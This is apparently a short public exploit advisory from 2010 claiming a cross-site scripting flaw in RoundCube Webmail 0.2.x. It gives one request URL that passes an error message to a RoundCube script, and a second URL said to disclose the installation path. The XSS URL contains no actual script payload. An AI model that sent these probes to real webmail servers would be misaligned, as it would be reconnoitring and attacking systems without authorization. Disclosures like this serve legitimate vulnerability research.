15 lines
No EOL
508 B
Text
15 lines
No EOL
508 B
Text
# Exploit Title: RoundCube Webmail XSS Voulerability
|
|
# Date: 6.01.2010
|
|
# Author: j4ck & Globus from elitehackers.pl
|
|
# Software Link: Software link : http://roundcube.net/download
|
|
# Version: 0.2.X , | possible voulerability in higher versions.
|
|
# Tested on: *
|
|
# Code :
|
|
|
|
XSS:
|
|
|
|
http://[somesite.com]/[roundcube_path]/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123
|
|
|
|
We can get FPD or roundcube installation path via:
|
|
|
|
http://www.[somesite.com]/webmail/program/steps/settings/identities.inc |